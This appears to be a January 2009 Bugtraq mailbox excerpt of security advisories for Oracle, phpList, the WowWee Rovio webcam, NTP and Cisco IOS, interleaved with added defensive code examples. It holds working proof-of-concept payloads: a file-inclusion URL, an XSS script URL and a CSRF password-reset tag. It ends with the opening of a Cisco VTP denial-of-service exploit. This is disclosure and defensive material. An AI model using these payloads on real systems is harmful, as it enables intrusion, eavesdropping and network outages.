Remote exploitation of two command injection vulnerabilities in the
authentication component of Oracle Corp.'s Secure Backup Administration
Server could allow an unauthenticated attacker to execute arbitrary
commands in the context of the running server.

In both cases, the vulnerabilities exist in PHP scripts that
authenticate a user attempting to use the service.

The first vulnerability is in "php/login.php". By making a login request
with a specially crafted cookie value, an attacker can execute arbitrary
code on the server.

The second vulnerability is in "php/common.php". This function is called
from the "login.php" page. A variable is used to specify a command to be
run. An attacker can supply any shell command for this variable and it
will be executed in the context of the web server process.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary shell commands in
the context of the web server process. Under Windows, the
Administration Server runs as SYSTEM, so the injected command will be
executed as SYSTEM. Under Linux it runs as an unprivileged user. No
authentication is required to exploit this vulnerability.

IV. DETECTION

Oracle Corp.'s Secure Backup version 10.2.0.2 for Linux, and Secure
Backup version 10.2.0.2 for Windows have been confirmed vulnerable.
Other versions and other platforms may also be affected.

V. WORKAROUND

Block access to the httpd interface of vulnerable servers.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4006 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

07/18/2008  Initial Vendor Notification
07/30/2008  Initial Vendor Reply
11/24/2008  Additional Vendor Feedback
01/13/2009  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbR5Dbjs6HoxIfBkRAiqHAKDxgxrDdjVEkqbYmee6NGCIeoKOLACgtl24
BAfUScwWY6Jz5DBquOL3cbE=MpPP
-----END PGP SIGNATURE-----

From - Wed Jan 14 12:12:18 2009
Message-ID: <20090114122017.xs71y1geowgkkco0@mail.amnpardaz.com>
Date: Wed, 14 Jan 2009 12:20:17 +0330
From: admin@bugreport.ir
To: bugtraq@securityfocus.com
Subject: phpList <= 2.10.8 Local File inclusion

########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title: phpList Local File inclusion
# Vendor: http://www.phplist.com
# Bug: Local File Inclusion
# Vulnerable Version: 2.10.8 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_60.htm
###################################################################


####################
- Description:
####################

Quote from vendor: "phplist is an open-source newsletter manager.
phplist is free to download, install and use, and is easy to integrate  
with any website.
phplist is downloaded more than 10 000 times per month and is listed  
in the top open source projects for vitality score on Freshmeat.
phplist is sponsored by tincan."


####################
- Vulnerability:
####################

+--> Local File Inclusion

Because of the vulnerability in "admin/index.php", when
"register_globals" is disabled (default PHP configuration) it is
possible for remote attackers to include arbitrary files from local
resources before performing authentication.

Code Snippet:
/lists/admin.php #line:10-18

if (!ini_get("register_globals") || ini_get("register_globals") == "off") {
   # fix register globals, for now, should be phased out gradually
   # sure, this gets around the entire reason that register globals
   # should be off, but going through three years of code takes a long time....

   foreach ($_REQUEST as $key => $val) {
     $$key = $val;
   }
}

/lists/admin.php #line:41-56

if (isset($_SERVER["ConfigFile"]) && is_file($_SERVER["ConfigFile"])) {
   print '<!-- using '.$_SERVER["ConfigFile"].'-->'."\n";
   include $_SERVER["ConfigFile"];
} elseif (isset($cline["c"]) && is_file($cline["c"])) {
   print '<!-- using '.$cline["c"].' -->'."\n";
   include $cline["c"];
} elseif (isset($_ENV["CONFIG"]) && is_file($_ENV["CONFIG"])) {
#  print '<!-- using '.$_ENV["CONFIG"].'-->'."\n";
   include $_ENV["CONFIG"];
} elseif (is_file("../config/config.php")) {
   print '<!-- using ../config/config.php -->'."\n";
   include "../config/config.php";
} else {
   print "Error, cannot find config file\n";
   exit;
}

####################
- POC:
####################

http://www.example.com/lists/admin/index.php?_SERVER[ConfigFile]=../.htaccess

####################
- Credit:
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
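
For defenders, the request shape in the POC above is easy to spot in web server logs: a query parameter whose base name is a PHP superglobal. The following Python check is an added example, not part of the original advisory or of phpList; the log lines, addresses and function names are constructed, and it assumes Apache combined log format.

```python
import re
from urllib.parse import parse_qsl

# Names PHP reserves for its superglobal arrays. A request parameter that uses
# one of them as its base name has no legitimate purpose in an application
# that copies request variables into the global scope.
SUPERGLOBALS = {
    "GLOBALS", "_SERVER", "_ENV", "_GET", "_POST",
    "_COOKIE", "_FILES", "_REQUEST", "_SESSION",
}

# Apache combined log format: client, identd, user, [time], "request", status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})\b'
)


def superglobal_params(target):
    """Return (name, value) pairs in a request target that name a superglobal.

    parse_qsl percent-decodes names, so _SERVER%5BConfigFile%5D is caught too.
    """
    query = target.partition("?")[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        base = name.split("[", 1)[0].strip()  # "_SERVER[ConfigFile]" -> "_SERVER"
        if base in SUPERGLOBALS:
            hits.append((name, value))
    return hits


def scan(lines):
    """Return one finding per log line that carries a superglobal parameter."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        hits = superglobal_params(match.group("target"))
        if hits:
            findings.append({
                "client": match.group("client"),
                "path": match.group("target").partition("?")[0],
                "status": int(match.group("status")),
                "params": hits,
            })
    return findings


# Constructed sample log (documentation address ranges). Limitation: the loop
# quoted in the advisory iterates $_REQUEST, which can also carry POST fields
# and cookies, and those do not appear in an access log.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jan/2009:12:20:17 +0330] "GET /lists/admin/index.php?_SERVER[ConfigFile]=../.htaccess HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [14/Jan/2009:12:21:03 +0330] "GET /lists/admin/index.php?page=send&_SERVER%5BConfigFile%5D=..%2F.htaccess HTTP/1.1" 200 498 "-" "-"',
    '192.0.2.33 - - [14/Jan/2009:12:22:40 +0330] "GET /lists/admin/index.php?page=send&id=4 HTTP/1.1" 200 8120 "-" "-"',
    '192.0.2.33 - - [14/Jan/2009:12:23:11 +0330] "GET /lists/?p=subscribe&server=mail HTTP/1.1" 200 3301 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```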

From - Wed Jan 14 12:12:18 2009
Message-ID: <496D256A.5090502@idefense.com>
Date: Tue, 13 Jan 2009 18:36:10 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration
 Server login.php Command Injection Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 13, 2009

I. BACKGROUND

Oracle Secure Backup is a network backup system for Oracle Databases.
For more information, see:

http://www.oracle.com/database/secure-backup.html

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in the
authentication component of Oracle Corp.'s Secure Backup Administration
Server could allow an unauthenticated attacker to execute arbitrary
commands in the context of the running server.

The vulnerability is in a function of common.php which is called from
the login.php page. The script fails to sanitize the input when
verifying the user has permission to use the service.

III. ANALYSIS

Successful exploitation allows an attacker to gain complete control over
an affected system. Because the Administration Server runs as an
unprivileged user, commands will be executed as that user. Under the
Linux (and possibly other) installations many files are installed world
writable. These include the configuration file for the Apache web-server
that the Administration Server is built on. This server starts as the
root user and changes to a user specified by the configuration files.
Since these files are writable by the user it may be possible for them
to gain access to the root user account. Other configuration and
executable files are also able to be changed.

IV. DETECTION

Oracle Corp.'s Secure Backup version 10.1.0.3 for Linux has been
confirmed vulnerable. Other versions and other platforms may also be
affected.

V. WORKAROUND

Block access to the httpd interface of vulnerable servers. Remove write
access for 'other' users to all files. The following command will
recursively change the permissions to remove write permission to
'other'.

chmod -R o-w directory/

This may prevent some aspects of the system from functioning correctly.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-5449 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/08/2007  Initial Vendor Notification
03/08/2007  Initial Vendor Reply
11/24/2008  Additional Vendor Feedback
01/13/2009  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbSVqbjs6HoxIfBkRArHaAJsFJIEtFoycfmcGAbikDpSDFvBrWwCfbLR0
qVu5Ie2NSW2bRoITpl4Jix4=VahW
-----END PGP SIGNATURE-----
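
Because the workaround above warns that removing write access for 'other' may break parts of the system, it helps to list what `chmod -R o-w` would change before applying it. The following Python audit is an added example, not part of the iDefense advisory or of Oracle's software; the function names are constructed, and the directory to audit is whatever installation path applies locally.

```python
import os
import stat


def world_writable(root):
    """Return sorted (path, mode) pairs under root that 'other' may write to.

    Symbolic links are skipped: their own mode bits are meaningless, and a
    link pointing outside root must not cause changes elsewhere.
    """
    candidates = [root]
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        candidates.extend(os.path.join(dirpath, name) for name in dirnames + filenames)

    found = []
    for path in candidates:
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            continue
        if st.st_mode & stat.S_IWOTH:
            found.append((path, stat.S_IMODE(st.st_mode)))
    return sorted(found)


def remove_other_write(root, apply=False):
    """Plan (and, with apply=True, perform) the equivalent of chmod -R o-w.

    Returns a list of (path, old_mode, new_mode) with the modes as octal
    strings, so the plan can be reviewed or kept as a rollback record.
    """
    changes = []
    for path, mode in world_writable(root):
        new_mode = mode & ~stat.S_IWOTH  # clear only the 'other' write bit
        changes.append((path, oct(mode), oct(new_mode)))
        if apply:
            os.chmod(path, new_mode)
    return changes


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, old, new in remove_other_write(target, apply=False):
        print(f"{old} -> {new}  {path}")
```

Run it once with `apply=False` and keep the output; it records the original modes if a change has to be reverted.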

From - Wed Jan 14 12:32:17 2009
Message-ID: <A875BEAACA374B739FA4B51E8CA6B632@HEDGEHOG>
From: "David Litchfield" <davidl@ngssoftware.com>
To: <full-disclosure@lists.grok.org.uk>, <bugtraq@securityfocus.com>
Subject: Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
Date: Tue, 13 Jan 2009 23:52:02 -0000


NGSSoftware Insight Security Research Advisory

Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL
Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2)
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 23rd July 2008
Date of Public Advisory: 13th January 2009
Advisory number: #NISR13012009
CVE: CVE-2008-3979

Overview
********
Oracle has just released a fix for a flaw that, when exploited, allows a low 
privileged authenticated database user to gain MDSYS privileges. This can be 
abused by an attacker to perform actions as the MDSYS user.

Details
*******
MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the 
Oracle Spatial Application. It is vulnerable to SQL injection. When a user 
drops a table the trigger fires. The name of the table is embedded in a 
dynamic SQL query which is then executed by the trigger. Note that the 
Oracle advisory states that the attacker requires the DROP TABLE and CREATE 
PROCEDURE privileges. This is not the case and only CREATE SESSION 
privileges are required.

Fix Information
***************
Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been 
made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner 
designed specifically for Oracle, can be used to accurately determine 
whether your servers are vulnerable to these flaws. More information about 
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oraclephp

About NGSSoftware
*****************
NGSSoftware, an NCC Group Company, develops vulnerability assessment and 
compliancy tools for database servers including Oracle, Microsoft SQL 
Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS 
has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and 
Seattle in the United States; NGS provide services to some of the largest 
and most demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076


From - Wed Jan 14 12:42:17 2009
Message-ID: <795651f40901140041h2fb9d686xf3345e1a0df6ef3e@mail.gmail.com>
Date: Wed, 14 Jan 2009 03:41:59 -0500
From: "Brian Dowling" <bjd@simplicity.net>
To: bugtraq@securityfocus.com
Subject: WowWee Rovio - Insufficient Access Controls - Covert Audio/Video Snooping Possible

SUMMARY

WowWee Rovio - Insufficient Access Controls - Covert Audio/Video
Snooping Possible

OVERVIEW

Rovio from WowWee does not adequately secure all accessible URLs or media
streams, enabling an unauthorized user with network access to the robotic
webcam platform the ability to listen to and view audio/video streamed from
the device's onboard camera.  Additionally, audio-send capabilities are also
not secured, enabling mischievous sending of audio through Rovio's built-in
speaker.  Additional manipulations may be possible; robot control does not
appear to be impacted at this time.

DESCRIPTION

From WowWee Website:

     Rovio(tm) is the ground breaking new Wi-Fi enable mobile webcam that lets
     you view and interact with its environment through streaming video and
     audio, wherever you are!

Unfortunately, Rovio's access control mechanisms (username/password) are not
completely utilized across the platform even when enabled.  Certain URLs and
RTSP Streaming capabilities of the device are accessible with no
authentication.  Furthermore, deployment of the device in the default
configuration attempts to use UPnP to automatically configure your firewall to
allow external access to the mobile webcam platform.

Resources exposed without proper access controls include:

rtsp://[rovio]/webcam   -- RTSP Audio/Video Stream, directly accessible.

and the following http://[rovio]:[publishedport]/ URLs are accessible to anyone:

/GetUPnP.cgi            -- Get UPnP config, including ports in use for RTSP
/GetStatus.cgi          -- display general device status
/GetVer.cgi             -- display firmware version, enables targeted
                           attacks, discovery.
/ScanWlan.cgi           -- display WiFi Networks visible to device
/GetAudio.cgi           -- "Send" audio to Rovio's speaker, "What's up Doc?"
/GetMac.cgi             -- device MAC address
/Upload.cgi             -- upload new firmware [actual upload untested]
/GetUpdateProgress.cgi
/GetTime.cgi
/GetLogo.cgi
/GetName.cgi
/GetVNet.cgi
/description.xml
/cmgr/control
/cmgr/event
/cdir/control
/cdir/event
/Cmd.cgi                -- Accessible without arguments, but does not appear
                           to allow ACL bypass to normally protected
                           sub-commands.  Unknown if any hidden commands exist.

/SendHttp.cgi           -- When authentication is enabled, this appears to be
                           protected.  However in a default configuration with
                           no authentication, it could provide for interesting
                           reverse-proxy like manipulation of web-based
                           firewall admin interfaces.

                           Additionally, this script is used by the "Ping
                           Test" that WowWee sends to their servers to help
                           verify your internet connectivity and UPnP settings
                           are working.  What's disheartening here is that
                           your IP address and rovio's port are sent to WowWee
                           and potentially stored in their server logs.


ADDITIONAL ISSUES

Additionally, WowWee is advised that they should alter the default
configuration to not automatically utilize UPnP to attempt to open up external
access to these devices.

1) In the default configuration no authentication is required until the user
   sets up accounts.

2) Proper notification should be displayed to users regarding the potential
   risks and ramifications of these settings and they must be involved in the
   decision process, by being required to take action to agree to
   expose such devices to external access.

Additionally, it should be noted that the platform uses HTTP Basic
authentication over unencrypted HTTP.  Using such mechanisms across the
internet does expose users to network-sniffing attacks, where an attacker
could obtain the credentials or observe the data streams being transmitted.

IMPACT

Users of this mobile wi-fi webcam may unwittingly open their homes up to
anonymous eaves-dropping of their personal lives and communications.

SOLUTION

WowWee must supply an updated firmware that fixes these issues.

WORKAROUND

Users of these devices are encouraged to disable direct external access and
seek other means to secure such access (Authenticated, Encrypting Proxies, or
Access over a VPN connection for example).  It is understood that most
consumers of these devices do not have such means, so WowWee should be
compelled to provide adequate protection and access controls.

REFERENCES

http://www.simplicity.net/vuln/2009-01-Rovio-insecurity.html
http://www.wowwee.com/en/products/tech/household/rovio

CREDIT

This issue was discovered and disclosed by Brian Dowling of Simplicity
Communications.

HISTORY

2009-01-06 - Initial Report to WowWee support.
2009-01-07 - Second request to simply confirm receipt of my first notification.
2009-01-08 - Automated, canned response from web-submission form.
2009-01-14 - Due to lack of appropriate, timely response, additional insight
             contained above and general concern for users of these devices
             unknowingly being exposed in this way, this information has been
             publicly disclosed.  Hopefully as WowWee forays into more
             networked-enabled consumer devices they will provide proper
             channels and handling for vulnerability disclosure.

From - Wed Jan 14 12:42:18 2009
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:007 ] ntp
Date: Tue, 13 Jan 2009 18:49:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMusP-0002OJ-9B@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:007
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : ntp
 Date    : January 13, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 A flaw was found in how NTP checked the return value of signature
 verification.  A remote attacker could use this to bypass certificate
 validation by using a malformed SSL/TLS signature (CVE-2009-0021).
 
 The updated packages have been patched to prevent this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0021
 _______________________________________________________________________

 Updated Packages:

 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
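
Added example (not part of the Mandriva advisory and not NTP's code): the class of flaw described above, a mis-checked return value from signature verification. toy_verify() is a constructed stand-in with no cryptographic value; it follows the tri-state convention documented for OpenSSL's EVP_VerifyFinal() (1 valid, 0 invalid, -1 error). All function names and sample data are assumptions made for illustration.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

#define SIG_BODY_LEN 4

/* Toy digest: XOR-fold the message into SIG_BODY_LEN bytes (NOT cryptography). */
static void toy_digest(const unsigned char *msg, size_t len,
                       unsigned char out[SIG_BODY_LEN])
{
    size_t i;
    memset(out, 0, SIG_BODY_LEN);
    for (i = 0; i < len; i++)
        out[i % SIG_BODY_LEN] ^= msg[i];
}

/* Toy signature format: one length byte (must equal SIG_BODY_LEN) + digest. */
static void toy_sign(const unsigned char *msg, size_t len,
                     unsigned char sig[1 + SIG_BODY_LEN])
{
    sig[0] = SIG_BODY_LEN;
    toy_digest(msg, len, sig + 1);
}

/* Returns 1 = valid, 0 = well-formed but wrong, -1 = error (unparseable). */
int toy_verify(const unsigned char *msg, size_t msg_len,
               const unsigned char *sig, size_t sig_len)
{
    unsigned char expect[SIG_BODY_LEN];

    if (sig_len != 1 + SIG_BODY_LEN || sig[0] != SIG_BODY_LEN)
        return -1;                      /* malformed encoding */
    toy_digest(msg, msg_len, expect);
    return memcmp(expect, sig + 1, SIG_BODY_LEN) == 0 ? 1 : 0;
}

/* Flawed check: only 0 counts as failure, so the -1 error case is accepted. */
int accept_flawed(const unsigned char *msg, size_t msg_len,
                  const unsigned char *sig, size_t sig_len)
{
    if (!toy_verify(msg, msg_len, sig, sig_len))
        return 0;
    return 1;
}

/* Corrected check: anything other than exactly 1 is rejected. */
int accept_strict(const unsigned char *msg, size_t msg_len,
                  const unsigned char *sig, size_t sig_len)
{
    return toy_verify(msg, msg_len, sig, sig_len) == 1;
}

enum sample { SAMPLE_VALID, SAMPLE_TAMPERED, SAMPLE_MALFORMED };

/* Runs one constructed sample through the flawed or the strict check. */
int run_sample(enum sample kind, int strict)
{
    static const unsigned char msg[] = "constructed sample message";
    unsigned char sig[1 + SIG_BODY_LEN];
    size_t sig_len = sizeof sig;

    toy_sign(msg, sizeof msg - 1, sig);
    if (kind == SAMPLE_TAMPERED)
        sig[1] ^= 0x01;                 /* well-formed, wrong value */
    if (kind == SAMPLE_MALFORMED) {
        sig[0] = 0xff;                  /* bad length byte ... */
        sig_len = 2;                    /* ... and truncated body */
    }
    return strict ? accept_strict(msg, sizeof msg - 1, sig, sig_len)
                  : accept_flawed(msg, sizeof msg - 1, sig, sig_len);
}

int main(void)
{
    static const char *names[] = { "valid", "tampered", "malformed" };
    int k;

    for (k = SAMPLE_VALID; k <= SAMPLE_MALFORMED; k++)
        printf("%-9s flawed=%d strict=%d\n", names[k],
               run_sample((enum sample)k, 0), run_sample((enum sample)k, 1));
    return 0;
}
```

When auditing code for this pattern, look for `if (!verify(...))` or `if (verify(...))` around any API whose error return is negative.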

From - Wed Jan 14 13:02:17 2009
Subject: RE: DoS code for Cisco VLAN Trunking Protocol Vulnerability
Date: Wed, 14 Jan 2009 11:50:38 +0800
From: "Paul Oxman (poxman)" <poxman@cisco.com>
To: "showrun.lee" <showrun.lee@gmail.com>,
<bugtraq@securityfocus.com>, <full-disclosure@lists.grok.org.uk>

Hello,
This is Paul Oxman with Cisco PSIRT.

For mitigations and workarounds, please consult the Cisco 
Security Response available at: 
http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml

Regards

________________________________

From: showrun.lee [mailto:showrun.lee@gmail.com] 
Sent: Wednesday, January 14, 2009 7:59 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Cc: Paul Oxman (poxman)
Subject: DoS code for Cisco VLAN Trunking Protocol Vulnerability



From - Wed Jan 14 13:02:18 2009
Date: Wed, 14 Jan 2009 11:37:06 +0000
From: ProCheckUp Research <research@procheckup.com>
To: <bugtraq@securityfocus.com>
Subject: PR08-19: XSS on Cisco IOS HTTP Server

PR08-19: XSS on Cisco IOS HTTP Server

Date found: 1st August 2008

Vendor contacted: 1st August 2008

Advisory publicly released: 14th January 2009

Severity: Medium

Credits: Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)

Description:

Cisco IOS HTTP server is vulnerable to XSS within invalid parameters
processed by the "/ping" server-side binary/script.


Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to the HTTP server of a
Cisco device.

This type of attack can result in non-persistent defacement of the
target admin interface, or the redirection of confidential information
to unauthorised third parties. i.e.: by scraping the data returned by
the '/level/15/exec/-/show/run/CR' URL via the XMLHttpRequest object.

It might also be possible to perform administrative changes by
submitting forged commands (CSRF) within the payload of the XSS attack.
i.e.: injecting an 'img' tag which points to
'/level/15/configure/-/enable/secret/newpass' would change the enable
password to 'newpass'.


Notes:

1. The victim administrator needs to be currently authenticated for this
vulnerability to be exploitable

2. In order to exploit this vulnerability successfully, the attacker
only needs to know the IP address of the Cisco device. There is NO need
to have access to the IOS HTTP server

Proof of concept (PoC):

http://192.168.100.1/ping?<script>alert("Running+code+within+the_context+of+"%2bdocument.domain)</script>


Content of HTML body returned:

<BODY BGCOLOR=#FFFFFF><H2>test-router</H2><HR><DT>Error: URL syntax:
?<script>alert("Running code within the_context of
"+document.domain)</script></BODY>

Successfully tested on:

Cisco 1803
Cisco IOS Software, C180X Software (C180X-ADVIPSERVICESK9-M), Version
12.4(6)T7, RELEASE SOFTWARE (fc5)


Assigned Cisco Bug ID#:

CSCsr72301

CVE reference:

CVE-2008-3821


References:

http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Fix:

Please see Cisco advisory for information on available updates.


Legal:

Copyright 2009 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp indicating this web page URL, and provided such
reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party. ProCheckUp
is not responsible for the content of external Internet sites.
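
Added example (not part of the ProCheckUp bulletin and not Cisco's code): the error page from the bulletin rendered with and without HTML-escaping of the echoed URL string, which is the fix Cisco's response describes. The page template and sample query are taken from the HTML body shown above; the function names and buffer sizes are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Error page layout, as shown in the bulletin's "HTML body returned". */
#define ERROR_PAGE_FMT \
    "<BODY BGCOLOR=#FFFFFF><H2>%s</H2><HR><DT>Error: URL syntax: ?%s</BODY>"

/* Decoded query string as it appears in the bulletin's returned body. */
#define SAMPLE_QUERY \
    "<script>alert(\"Running code within the_context of \"" \
    "+document.domain)</script>"

/* HTML-escape src into dst. Returns the escaped length, or -1 if dst is too
 * small, so the caller fails closed instead of emitting a truncated page. */
int html_escape(const char *src, char *dst, size_t dst_size)
{
    size_t used = 0;

    if (dst_size == 0)
        return -1;
    for (; *src; src++) {
        char one[2] = { *src, '\0' };
        const char *rep;
        size_t n;

        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        n = strlen(rep);
        if (used + n + 1 > dst_size)
            return -1;
        memcpy(dst + used, rep, n);
        used += n;
    }
    dst[used] = '\0';
    return (int)used;
}

/* Render the error page. escape == 0 reproduces the behaviour the bulletin
 * reports (input echoed verbatim); escape != 0 is the hardened form. */
int render_error_page(const char *host, const char *query, int escape,
                      char *out, size_t out_size)
{
    char h[128], q[1024];
    int n;

    if (escape) {
        if (html_escape(host, h, sizeof h) < 0 ||
            html_escape(query, q, sizeof q) < 0)
            return -1;
        host = h;
        query = q;
    }
    n = snprintf(out, out_size, ERROR_PAGE_FMT, host, query);
    return (n < 0 || (size_t)n >= out_size) ? -1 : n;
}

/* Renders the sample request; returns NULL if rendering failed. */
const char *demo_render(int escape)
{
    static char page[2048];

    if (render_error_page("test-router", SAMPLE_QUERY, escape,
                          page, sizeof page) < 0)
        return NULL;
    return page;
}

int main(void)
{
    printf("unescaped: %s\n\n", demo_render(0));
    printf("escaped:   %s\n", demo_render(1));
    return 0;
}
```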

From - Wed Jan 14 13:12:18 2009
Date: 14 Jan 2009 05:07:03 -0000
From: showrun.lee@gmail.com
To: bugtraq@securityfocus.com
Subject: DoS code for Cisco VLAN Trunking Protocol Vulnerability

/*DoS code for Cisco VLAN Trunking Protocol Vulnerability
 *
 *vulnerability description:
 *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
 *
 *To know:
 * 1.the switch must be in Server/Client mode.
 * 2.the port the attacker is connected to must be in trunk mode.
 *   Cisco Ethernet ports with no configuration are not
 *   in trunk, but trunk mode can be obtained through a DTP
 *   attack by Yersinia.
 * 3.you must know the VTP domain; this can be sniffed
 * 4.some code is from Yersinia.
 *
 *Result:
 * switch reload.
 *
 *
 *Compile:
 * gcc -o vtp `libnet-config --libs` vtp.c
 *
 *Usage:vtp -i <interface> -d <vtp_domain>
 *
 *Contact: showrun.lee[AT]gmail.com
 *http://sh0wrun.blogspot.com/
 */
#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>

#define VTP_DOMAIN_SIZE    32
#define VTP_TIMESTAMP_SIZE 12

struct vtp_summary {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  followers;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
     u_int32_t updater;
     u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];
     u_int8_t  md5[16];
};

struct vtp_subset {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  seq;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
};

void usage( char *s) {
    printf("%s -i <interface> -d <vtp domain>\n",s);
    exit (1);
}

int main( int argc, char *argv[] )
{
    int opt,k=0;
    extern char *optarg;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet,*vtp_packet2, *aux;
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
